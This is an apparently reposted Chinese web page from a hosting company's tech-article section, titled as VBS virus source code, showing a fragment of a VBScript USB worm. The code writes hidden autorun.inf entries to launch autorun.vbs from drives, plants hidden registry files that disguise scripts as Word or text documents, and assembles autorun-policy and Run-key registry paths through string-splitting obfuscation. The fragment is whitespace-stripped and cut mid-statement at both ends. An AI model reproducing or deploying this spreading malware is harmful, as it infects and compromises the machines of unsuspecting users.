vbs病毒源文件
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
hr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34) ts.close Setf=fs.GetFile(fs.GetSpecialFolder(1)&"\doc.reg") f.attributes=f.attributes+7 else Setts=fs.CreateTextFile(w.DriveLetter&":\vbs.reg",true) ts.WriteLine"WindowsRegistryEditorVersion5.00" ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34) ts.close Setf=fs.GetFile(w.DriveLetter&":\vbs.reg") f.attributes=f.attributes+7 Setts=fs.CreateTextFile(w.DriveLetter&":\doc.reg",true) ts.WriteLine"WindowsRegistryEditorVersion5.00" ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]" ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34) ts.close Setf=fs.GetFile(w.DriveLetter&":\doc.reg") f.attributes=f.attributes+7 endif endif endif Iffs.FileExists(w.DriveLetter&":\autorun.inf")Then Setc=fs.opentextfile(w.DriveLetter&":\autorun.inf",1) vbc=c.readall IfInStr(vbc,"WScript.exe.\autorun.vbs")<>0Then c.Close Else Setf=fs.GetFile(w.DriveLetter&":\autorun.inf") f.attributes=f.attributes-f.attributes Setts=f.OpenAsTextStream(2,-2) ts.WriteLine"[AutoRun]" ts.WriteLine"open=" ts.WriteLine"" ts.WriteLine"shell\open=打开(&O)" ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs" ts.WriteLine"shell\open\Default=1" ts.close f.attributes=f.attributes+7 endif else Setts=fs.CreateTextFile(w.DriveLetter&":\autorun.inf",true) ts.WriteLine"[AutoRun]" ts.WriteLine"open=" ts.WriteLine"" ts.WriteLine"shell\open=打开(&O)" ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs" ts.WriteLine"shell\open\Default=1" ts.close Setf=fs.GetFile(w.DriveLetter&":\autorun.inf") f.attributes=f.attributes+7 EndIf endif endFunction Functionregwrite() OnErrorResumeNext dims a1="HKE"&"Y_CUR"&"RENT_US"&"ER\Soft"&"ware\Mi"&"croso"&"ft\Win"&"dows\Cur"&"rentV"&"ersion\Exp"&"lorer\Ad"&"vanced\"(a1=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ a2="HK"&"EY_CLAS"&"SES_RO"&"OT\DLL"&"File\"(a2=HKEY_CLASSES_ROOT\DLLFile) a3="HKEY"&"_LOCA"&"L_MACH"&"INE\SOFT"&"WARE\Mi"&"cros"&"oft\Win"&"dows\Cur"&"rentVer"&"sion\poli"&"cies\Expl"&"orer\NoDr"&"iveTypeAutoRun" (a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun) a4="HKE"&"Y_CURR"&"ENT_USE"&"R\Softw"&"are\Micr"&"osoft\Wi"&"ndows\Cur"&"rentVersi"&"on\Polici"&"es\Explor"&"er\NoDriveT"&"ypeAutoRun" (a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun) a5="HK"&"EY_LO"&"CAL_MA"&"CHINE\Sof"&"tware\Mi"&"croso"&"ft\Wind"&"ows\Curre"&"ntVersi"&"on\Ru"&"n\USBDR"&"IVE.dll" (a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll) a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e) a7="HKE"&"Y_CLAS"&"SES_ROO"&"T\VBSF"&"ile\Defau"&"ltIcon\" (a7=HKEY_CLASSES_ROOT\VBSF |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 用vbs操作注册表实例代码下一篇: 学习 WSH 的理由小结
关于vbs病毒源文件的所有评论